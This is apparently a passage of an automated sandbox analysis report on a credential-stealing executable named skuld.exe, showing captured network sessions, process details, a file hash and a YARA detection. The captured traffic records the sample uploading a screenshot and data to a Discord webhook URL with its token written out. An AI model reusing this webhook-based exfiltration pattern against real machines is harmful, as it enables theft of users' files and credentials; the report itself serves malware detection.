                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bBiy5CXbJyhgxYtuIHPZl3FmesYwpSk7T%2Bak7N0mKr76J1Tivt1F4pR0G2rP5pAm2Knxm9NlNQu977wb9bSqYbVtw23zycieaYU2APKVrkwVTfCA6%2BaElFEXXdZv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
                                                                                                                                          2025-03-12 09:40:51 UTC818INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 6e 6f 6e 65 27 3b 20 64 65 66 61 75 6c 74 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 6f 36 34 33 37 34 2e 69 6e 67 65 73 74 2e 73 65 6e 74 72 79 2e 69 6f 3b 20 72 65 70 6f 72 74 2d 74 6f 20 63 73 70 2d 73 65 6e 74 72 79 3b 20 72 65 70 6f 72 74 2d 75 72 69 20 68 74 74 70 73 3a 2f 2f 6f 36 34 33 37 34 2e 69 6e 67 65 73 74 2e 73 65 6e 74 72 79 2e 69 6f 2f 61 70 69 2f 35 34 34 31 38 39 34 2f 73 65 63 75 72 69 74 79 2f 3f 73 65 6e 74 72 79 5f 6b 65 79 3d 38 66 62 62 63 65 33 30 62 66 35 32 34 34 65 63 39 34 32 39 35 34 36 62 65 65 66 32 31 38 37 30 26 73 65 6e 74 72 79 5f 65 6e 76 69 72 6f 6e 6d 65 6e 74 3d 73 74 61 62 6c 65 0d 0a 53 65 74
                                                                                                                                          Data Ascii: Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stableSet
                                                                                                                                          2025-03-12 09:40:51 UTC798INData Raw: 35 34 65 0d 0a 7b 22 74 79 70 65 22 3a 30 2c 22 63 6f 6e 74 65 6e 74 22 3a 22 22 2c 22 6d 65 6e 74 69 6f 6e 73 22 3a 5b 5d 2c 22 6d 65 6e 74 69 6f 6e 5f 72 6f 6c 65 73 22 3a 5b 5d 2c 22 61 74 74 61 63 68 6d 65 6e 74 73 22 3a 5b 7b 22 69 64 22 3a 22 31 33 34 39 33 31 36 32 30 31 34 30 36 35 32 39 36 30 37 22 2c 22 66 69 6c 65 6e 61 6d 65 22 3a 22 62 72 6f 77 73 65 72 73 2e 7a 69 70 22 2c 22 73 69 7a 65 22 3a 32 32 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 33 34 38 33 32 39 35 33 31 31 34 38 30 37 39 31 30 34 2f 31 33 34 39 33 31 36 32 30 31 34 30 36 35 32 39 36 30 37 2f 62 72 6f 77 73 65 72 73 2e 7a 69 70 3f 65 78 3d 36 37 64 32 61 38 32 33 26 69 73 3d 36
                                                                                                                                          Data Ascii: 54e{"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1349316201406529607","filename":"browsers.zip","size":22,"url":"https://cdn.discordapp.com/attachments/1348329531148079104/1349316201406529607/browsers.zip?ex=67d2a823&is=6
                                                                                                                                          2025-03-12 09:40:51 UTC567INData Raw: 78 74 2d 31 2e 64 69 73 63 6f 72 64 61 70 70 2e 6e 65 74 2f 65 78 74 65 72 6e 61 6c 2f 77 37 47 59 48 38 65 63 7a 63 43 72 61 65 48 78 32 6c 4c 71 39 6a 31 67 54 44 5a 7a 4d 32 56 42 77 35 41 4c 68 51 64 62 5a 76 59 2f 25 33 46 76 25 33 44 34 2f 68 74 74 70 73 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 75 2f 31 34 35 34 38 37 38 34 35 22 7d 7d 5d 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 35 2d 30 33 2d 31 32 54 30 39 3a 34 30 3a 35 31 2e 34 37 34 30 30 30 2b 30 30 3a 30 30 22 2c 22 65 64 69 74 65 64 5f 74 69 6d 65 73 74 61 6d 70 22 3a 6e 75 6c 6c 2c 22 66 6c 61 67 73 22 3a 30 2c 22 63 6f 6d 70 6f 6e 65 6e 74 73 22 3a 5b 5d 2c 22 69 64 22 3a 22 31 33 34 39 33 31 36 32 30 31 33 30 35 36 30 38 32 37
                                                                                                                                          Data Ascii: xt-1.discordapp.net/external/w7GYH8eczcCraeHx2lLq9j1gTDZzM2VBw5ALhQdbZvY/%3Fv%3D4/https/avatars.githubusercontent.com/u/145487845"}}],"timestamp":"2025-03-12T09:40:51.474000+00:00","edited_timestamp":null,"flags":0,"components":[],"id":"134931620130560827
                                                                                                                                          2025-03-12 09:40:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.1849755162.159.136.2324437148C:\Users\user\Desktop\skuld.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-12 09:41:25 UTC323OUTPOST /api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbw HTTP/1.1
                                                                                                                                          Host: discord.com
                                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                                          Content-Length: 66661
                                                                                                                                          Content-Type: multipart/form-data; boundary=1f52b4de3edcfd4971268313d9c91190027d2626bf5fa132aba29cc954f0
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          2025-03-12 09:41:25 UTC863OUTData Raw: 2d 2d 31 66 35 32 62 34 64 65 33 65 64 63 66 64 34 39 37 31 32 36 38 33 31 33 64 39 63 39 31 31 39 30 30 32 37 64 32 36 32 36 62 66 35 66 61 31 33 32 61 62 61 32 39 63 63 39 35 34 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5b 30 5d 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 6e 6f 72 64 69 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 76 77 37 54 77 58 31 54 4e 31 5c 5c 44 69 73 70 6c 61 79 20 28 31 29 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00
                                                                                                                                          Data Ascii: --1f52b4de3edcfd4971268313d9c91190027d2626bf5fa132aba29cc954f0Content-Disposition: form-data; name="file[0]"; filename="C:\\Users\\user\\AppData\\Local\\Temp\\vw7TwX1TN1\\Display (1).png"Content-Type: application/octet-streamPNGIHDR
                                                                                                                                          2025-03-12 09:41:25 UTC2372OUTData Raw: 8b 29 a9 5b b7 ae fc f3 91 47 65 f0 d0 a1 d2 bb 6f 3f 63 e8 e7 15 2d 00 f4 7a f2 a9 a7 a4 77 ef 3e 32 36 3f 5f ba 74 ed 26 57 5f 73 8d f1 de 99 a6 fd 1b 77 c9 8e c2 be 52 f4 fd d3 b2 71 e6 3f 65 d3 b7 8f 48 d1 77 8f 4a f1 ac c7 a4 78 f6 e3 b2 e5 fb 7f c9 d6 39 ff 91 ad 3f 3c 21 25 73 9f 94 92 9f 9e 96 d2 f9 cf 58 fe 2b db 17 fc 4f ca 0b 9e b7 bc 20 15 0b 5f b2 bc 2c 3b 16 bf 2a 3b 97 bc 2e 3b 97 36 97 5d 4b df 94 5d cb 5b 4a bd 93 ff 64 bc 77 26 a9 8e 00 50 21 04 04 00 00 00 00 00 59 c8 58 4c d8 d1 47 1f 2d 8f 3e f6 98 0c 1d 3e 5c fa f5 eb a7 67 ef 99 c2 3e 93 78 02 40 af a7 9e 7a 4a fa f4 ed 2b e3 3e 9e 20 dd bb f7 90 a6 4d 9b 1a fb 94 09 54 00 b8 6b 75 5f d9 b5 e6 1d d9 b4 70 90 ac 99 fb b6 6c f8 f6 3f b2 66 c1 30 59 bf 64 92 ac 5d f0 ae 6c 9c d7 59 36
                                                                                                                                          Data Ascii: )[Geo?c-zw>26?_t&W_swRq?eHwJx9?<!%sX+O _,;*;.;6]K][Jdw&P!YXLG->>\g>x@zJ+> MTku_pl?f0Yd]lY6
                                                                                                                                          2025-03-12 09:41:25 UTC538OUTData Raw: bf 8e c7 bb 7f a4 83 c1 9c 8e 5f 54 e9 6f 00 d6 3f e3 4c 63 df 6a a3 f6 cd 55 00 d8 d3 99 fd a7 c2 3f ff ec 3f 59 d9 d5 0e 00 8b 8b f5 07 40 ca ee bf 55 b6 5f 79 a1 94 f6 ee 2a db d6 af 8f 1a 00 ae 58 b9 52 5a 66 49 00 a8 b8 cd fb 55 60 55 f7 7e f5 d7 3b 53 d0 fd 28 88 97 1b e4 05 eb b1 10 00 02 00 00 00 00 80 2c 60 2c 26 ed b2 cb af d0 e1 5e f0 77 fe 1a 77 9c a2 79 03 40 45 cd 06 6c dd e7 dd 2a 0d 00 8f 3d ee cf c6 be d5 46 ed 9b df 6e 07 80 a1 57 7f dd d9 7f 2a fc eb 66 79 5b 76 cc 78 5b b6 5f 73 89 94 1f 7f 98 94 f6 e8 24 a5 dd 3a 4a d9 b3 ff 96 b2 3b ff 2e db d6 86 5f 07 f6 06 80 cb 97 af 90 b7 26 ae c8 9a 00 d0 7d b5 d7 bb 0c ee 73 3f 0a e2 dd e7 e5 0d f3 92 41 00 08 00 00 00 00 00 32 94 b1 98 b4 bf 9d 70 42 28 dc 53 bf fb a7 03 c0 57 16 c8 05 2d be
                                                                                                                                          Data Ascii: _To?LcjU??Y@U_y*XRZfIU`U~;S(,`,&^wwy@El*=FnW*fy[vx[_s$:J;._&}s?A2pB(SW-
                                                                                                                                          2025-03-12 09:41:25 UTC4744OUTData Raw: fb 9d 00 50 f9 6f 97 f7 53 0a 00 33 e9 0b c0 8a 0e 00 55 e0 a7 c3 bf c8 d9 7f b2 a2 93 ec 58 f4 9e 2f e8 8b c6 1b 00 1e f7 f2 0c 39 ec d5 39 32 ec db b5 59 11 00 7a 7f eb 4f b5 b3 fe 3d 2d ae 7d 5e de 30 2f 19 04 80 00 00 00 00 00 20 43 19 8b 29 69 dd ba 6d 28 00 54 bf 05 a8 5e ff dd ef f9 9f 42 01 60 dd b6 b3 42 01 a0 f6 96 e5 b5 9f 64 bf 97 66 4b 9b 1e 43 53 0a 00 33 e9 0b c0 4a fb d7 6f 95 5d 2a f0 d3 af fe 46 ce fe 93 e5 1d a5 62 dd c7 c6 c0 2f c8 1f 00 4e 97 3d 9e fa 4e 86 7e bb 26 2b 02 c0 aa 60 0a f5 12 41 00 08 00 00 00 00 00 32 94 b1 98 92 67 ff f7 9c 6f 16 a0 eb d9 b7 47 ea a5 fa 1a b0 fa fa af 2f 04 b4 5c d7 e5 93 94 5f 01 ce a4 2f 00 2b 76 00 d8 d5 09 ff 22 67 ff c9 f2 3c a9 58 3b 5e b6 6c d9 62 0c fd bc bc 01 e0 9f 75 00 f8 ad 0c 9d 49 00 e8
                                                                                                                                          Data Ascii: PoS3UX/992YzO=-}^0/ C)im(T^B`BdfKCS3Jo]*Fb/N=N~&+`A2goG/\_/+v"g<X;^lbuI
                                                                                                                                          2025-03-12 09:41:25 UTC5930OUTData Raw: 00 01 00 00 00 00 40 86 32 16 e3 62 0a d9 92 a5 02 3f 6f 5b 35 66 94 f1 b8 54 98 9e a1 a6 19 03 40 cf ec 3f 59 dd 57 76 6e 32 07 80 bf fc 52 20 3f ce 9a 12 11 ee 29 cb 96 2d 93 b5 6b d7 ca aa 55 ab e4 f3 cf 3f 8b d8 4f 00 98 38 02 40 00 00 00 00 00 90 a1 8c c5 b8 98 42 b6 64 79 5f fd 55 4d 6d 9b 8e 4b 85 e9 19 6a 5a 64 00 e8 ce fe 53 e1 5f 3f 91 55 7d 64 e7 a6 2f 8c 81 94 0a 00 57 2c 5f 2a 9b 37 ae 8e 08 f8 e6 cd 9b a7 67 01 ae 5c b9 52 e6 fc f0 83 cc 99 33 c7 b7 9f 00 30 71 04 80 00 00 00 00 00 20 43 19 8b 71 31 85 6c c9 72 5f 03 76 9b da 36 1d 97 0a d3 33 d4 b4 88 00 d0 3b fb 6f 55 5f 4b 6f 59 bb 72 ac 6c 29 d9 1a 11 48 a9 00 50 fd 16 e0 dc d9 5f f8 c2 3d a5 70 d5 6a 59 bb 76 9d 2c 5e bc c4 3a 6e a1 0e fc bc fb 33 31 00 5c b6 69 b5 f3 b7 43 e4 9a 3e 4f
                                                                                                                                          Data Ascii: @2b?o[5fT@?YWvn2R ?)-kU?O8@Bdy_UMmKjZdS_?U}d/W,_*7g\R30q Cq1lr_v63;oU_KoYrl)HP_=pjYv,^:n31\iC>O
                                                                                                                                          2025-03-12 09:41:25 UTC7116OUTData Raw: ca bf fe 22 b3 3e b6 8e 59 71 b5 d4 3b f9 00 df bd 6a 9b 01 03 06 d8 a1 56 20 cc 8a 19 68 29 4e a8 a5 d6 83 bf 69 a7 b7 2d 6b d6 ae 95 55 ab d7 78 ac 96 55 ab 56 4b a1 65 dd ba f5 d2 a1 63 47 63 9f 6a 2b c6 0a 00 00 00 00 00 20 29 c6 62 42 46 5e 7f a8 c8 0b 47 8b bc 7a a4 c8 9b 87 8b b4 b2 b6 db 1f 22 f2 b6 1d 02 ca c0 3f 88 bc 7b 98 b5 fc 8b 48 ef d3 e5 d5 ab ed 99 79 8d 0e f9 bb f4 3c fd 73 19 73 de 32 c9 cf 59 21 e3 72 56 ca 78 8b 5a aa 6d 55 1f 73 e1 cf 32 fd 91 f7 65 fd d8 bb 45 e6 39 bf 0b f8 b3 45 fd 36 60 28 10 6c a4 67 ff e9 00 f0 97 cb ac fd 97 4b 87 97 4f 91 5d 4b af 92 59 e3 72 22 fa 5b 9b f4 ef df df 10 6a d9 a1 55 d4 50 cb da b6 67 b0 85 03 2d 53 a8 a5 b6 fd ca a4 b4 b4 4c 4a 2c 15 15 3b a4 43 5e 66 85 5a 8c 15 00 00 00 00 00 40 52 8c c5 b8
                                                                                                                                          Data Ascii: ">Yq;jV h)Ni-kUxUVKecGcj+ )bBF^Gz"?{Hy<ss2Y!rVxZmUs2eE9E6`(lgKO]KYr"[jUPg-SLJ,;C^fZ@R
                                                                                                                                          2025-03-12 09:41:25 UTC8302OUTData Raw: 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00
                                                                                                                                          Data Ascii: dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0
                                                                                                                                          2025-03-12 09:41:25 UTC6676OUTData Raw: ed c0 3e c3 b5 54 ae 67 07 82 b1 ae 13 d8 f6 cd fe 73 5a 7e ae 73 1c 00 00 00 00 00 00 b0 db 31 16 e3 94 e8 6f 00 7a b7 03 fb aa 34 00 8c 15 4a 02 00 00 00 00 00 00 bb 15 63 31 7e ce eb b8 be 10 30 27 da 57 80 bd db a6 7d 9e eb f8 82 bc 58 d7 09 6e db d7 e1 b5 5f 00 00 00 00 00 00 40 33 16 13 13 7c ed 36 f4 bb 80 95 05 75 de 7d 16 df 75 a2 9d 17 c7 76 b0 3f bc 02 0c 00 00 00 00 00 80 dd 97 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00 b2 83 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00 b2 83 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00 b2 83 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00 b2 83 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00 b2 83 b1 08 00 00 00 00 00 00 20 3b 18 8b 00 00 00 00 00 00 00
                                                                                                                                          Data Ascii: >TgsZ~s1oz4Jc1~0'W}Xn_@3|6u}uv? ; ; ; ; ; ;
                                                                                                                                          2025-03-12 09:41:25 UTC10674OUTData Raw: ac e3 c2 fb 4c cf 1b cf bd fd cf 6f 37 35 36 e6 67 52 9b d6 35 43 63 e3 8c 69 4e 9e d8 bb 53 ef 4f ec b1 a0 11 00 02 00 80 14 18 8b 48 b3 64 03 40 15 ec b9 e7 96 3d f5 a8 6c 6f 72 61 68 5b 51 41 a0 aa 85 ea 47 1d 10 f3 15 61 f7 3c 53 1f 01 00 48 b7 84 03 40 ab 15 e4 d9 41 5e 30 bb f2 05 57 2a a8 0a 04 53 7a 9f 0e 10 9d 73 03 61 a2 3a df be 66 81 e4 e5 b8 21 94 13 5e 85 02 29 27 ac 72 6f ae 5f 47 76 af e1 3d 36 d6 71 6a 33 dc 57 fb 79 cc a1 57 ac e3 2a 7b de 58 f7 8e 7c ce 70 d3 f7 f1 9c 9b 63 1d e3 de 27 7c 4f fb 1e a1 fb 5b 2d 95 fe b8 e7 c5 1a 0b 1a 01 20 00 00 48 89 b1 88 34 73 83 37 53 28 17 4d c9 fc 9f 42 b3 ff 5c 2a e8 d3 b3 fd de 1f aa 5f 09 56 fb d5 b6 9a f9 a7 02 42 f7 18 d3 f5 14 f7 3a a6 3e 02 00 90 6e c9 04 80 76 73 42 25 5f c8 e4 0d 8e bc db
                                                                                                                                          Data Ascii: Lo756gR5CciNSOHd@=lorah[QAGa<SH@A^0W*Szsa:f!^)'ro_Gv=6qj3WyW*{X|pc'|O[- H4s7S(MB\*_VB:>nvsB%_
                                                                                                                                          2025-03-12 09:41:25 UTC11860OUTData Raw: 10 ce 04 9c 0c 00 57 6a 00 38 94 00 b0 97 10 00 02 00 00 00 00 00 a4 9e 59 2c 49 b6 fb 4f c3 bf 48 f7 df c6 69 fe 7a cb 1c d9 f1 ec 59 b2 4b 67 02 4e 06 80 4b 2f 48 04 80 97 49 9b ce 04 4c 00 d8 2b 08 00 01 00 00 00 00 00 52 cf 2c 96 24 db fd a7 e1 df ad 7e d7 9f 76 ff 6d 9c ea 6f 6f 99 1d 0b 00 eb 17 9d 13 04 80 fe 44 20 04 80 71 27 9f 7c b2 7c e6 33 9f 91 53 4e 39 45 6e bd f5 d6 9c da 8d 37 de e8 6a 0f 3d f4 90 ab 85 f4 73 f4 3a 16 02 40 00 00 00 00 00 80 d4 33 8b 25 c9 db fd a7 01 e0 e6 99 b2 7f e5 f5 f1 0e 40 9d 09 38 19 00 be 92 3f 00 ec 70 01 e0 88 8a 09 00 c3 30 ef 9e 7b ee 71 db 8b 16 2d 72 6b 0d 03 9f 78 e2 09 17 06 6a 08 18 ee d7 9a da b6 6d 9b 79 bd 28 02 40 00 00 00 00 00 80 d4 33 8b 25 c9 db fd a7 21 e0 e6 19 b2 f3 f9 73 5d 00 b8 d3 05 80 83
                                                                                                                                          Data Ascii: Wj8Y,IOHizYKgNK/HIL+R,$~vmooD q'||3SN9En7j=s:@3%@8?p0{q-rkxjmy(@3%!s]
                                                                                                                                          2025-03-12 09:41:26 UTC1128INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 12 Mar 2025 09:41:26 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: __dcfduid=2a9d383eff2611ef82bccacda771ab44; Expires=Mon, 11-Mar-2030 09:41:26 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                          x-ratelimit-reset: 1741772487
                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                          vary: Accept-Encoding
                                                                                                                                          via: 1.1 google
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VDr0cS4lfrYc8AEOFGg4pvnyr6oDa%2FZU2qg%2FqJXnQJ%2BCvv5Yz0WSonf841wxiN91qVlhJiGHwpOx9S04H12d%2Bwex14SxMfvXwTKbDH%2BKOuOLaBGi5yVY2XmnGQSv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.1849761162.159.137.2324437148C:\Users\user\Desktop\skuld.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-12 09:41:28 UTC321OUTPOST /api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbw HTTP/1.1
                                                                                                                                          Host: discord.com
                                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                                          Content-Length: 287
                                                                                                                                          Content-Type: multipart/form-data; boundary=b1b87285c08b2c052a76e6c794e732a9af3417a2f7d86fce4544f23ca996
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          2025-03-12 09:41:28 UTC287OUTData Raw: 2d 2d 62 31 62 38 37 32 38 35 63 30 38 62 32 63 30 35 32 61 37 36 65 36 63 37 39 34 65 37 33 32 61 39 61 66 33 34 31 37 61 32 66 37 64 38 36 66 63 65 34 35 34 34 66 32 33 63 61 39 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 61 79 6c 6f 61 64 5f 6a 73 6f 6e 22 0d 0a 0d 0a 7b 22 61 76 61 74 61 72 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 69 2e 69 62 62 2e 63 6f 2f 47 46 5a 32 74 48 4a 2f 73 68 61 6b 61 62 61 69 61 6e 6f 2d 31 36 37 34 32 38 32 34 38 37 2e 6a 70 67 22 2c 22 65 6d 62 65 64 73 22 3a 5b 5d 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 6b 75 6c 64 22 7d 0a 0d 0a 2d 2d 62 31 62 38 37 32 38 35 63 30 38 62 32 63 30 35 32 61 37 36 65 36 63 37 39 34 65 37 33 32 61 39
                                                                                                                                          Data Ascii: --b1b87285c08b2c052a76e6c794e732a9af3417a2f7d86fce4544f23ca996Content-Disposition: form-data; name="payload_json"{"avatar_url":"https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpg","embeds":[],"username":"skuld"}--b1b87285c08b2c052a76e6c794e732a9
                                                                                                                                          2025-03-12 09:41:28 UTC1358INHTTP/1.1 400 Bad Request
                                                                                                                                          Date: Wed, 12 Mar 2025 09:41:28 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 58
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: __dcfduid=2bfa1b8eff2611ef9f7ec295391f385e; Expires=Mon, 11-Mar-2030 09:41:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                          x-ratelimit-reset: 1741772489
                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                          via: 1.1 google
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1U%2BlTiicCrXdJaCCnodnrOAjlcpRLMWftQhDMzYCAm68JRU%2BQ%2FZVruy81BvkMWUrJJaAL9XpRfeBsHD1HewcWoSKa%2BcJco0fBwzAfrzT6QejfzRzuqyh9ZXF6o%2FT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
                                                                                                                                          2025-03-12 09:41:28 UTC566INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 73 64 63 66 64 75 69 64 3d 32 62 66 61 31 62 38 65 66 66 32 36 31 31 65 66 39 66 37 65 63 32 39 35 33 39 31 66 33 38 35 65 63 31 39 30 30 66 64 37 30 32 62 37 66 33 37 38 63 35 32 30 64 64 32 65 63 36 62 32 66 61 62 61 64 34 30 64 31 32 63 35 37 63 30 65 61 63 64 35 37 33 34 37 38 38 63 39 66 61 33 39 38 37 65 33 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 31 31 2d 4d 61 72 2d 32 30 33 30 20 30 39 3a 34 31 3a 32 38 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 31 35 37 36 38 30 30 30 30 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 30 36 66 30 35 31 64 35 30 62 30 63 64 30 35
                                                                                                                                          Data Ascii: Set-Cookie: __sdcfduid=2bfa1b8eff2611ef9f7ec295391f385ec1900fd702b7f378c520dd2ec6b2fabad40d12c57c0eacd5734788c9fa3987e3; Expires=Mon, 11-Mar-2030 09:41:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=06f051d50b0cd05
                                                                                                                                          2025-03-12 09:41:28 UTC58INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 43 61 6e 6e 6f 74 20 73 65 6e 64 20 61 6e 20 65 6d 70 74 79 20 6d 65 73 73 61 67 65 22 2c 20 22 63 6f 64 65 22 3a 20 35 30 30 30 36 7d
                                                                                                                                          Data Ascii: {"message": "Cannot send an empty message", "code": 50006}


                                                                                                                                          Statistics

                                                                                                                                          CPU Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          Memory Usage

                                                                                                                                          Click to jump to process

                                                                                                                                          High Level Behavior Distribution

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Behavior

                                                                                                                                          Click to jump to process

                                                                                                                                          System Behavior

                                                                                                                                          General

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:05:40:43
                                                                                                                                          Start date:12/03/2025
                                                                                                                                          Path:C:\Users\user\Desktop\skuld.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Users\user\Desktop\skuld.exe"
                                                                                                                                          Imagebase:0x950000
                                                                                                                                          File size:10'810'368 bytes
                                                                                                                                          MD5 hash:1B19480E05B72ABB96AAFDF9625B5646
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1453903511.0000000000E47000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
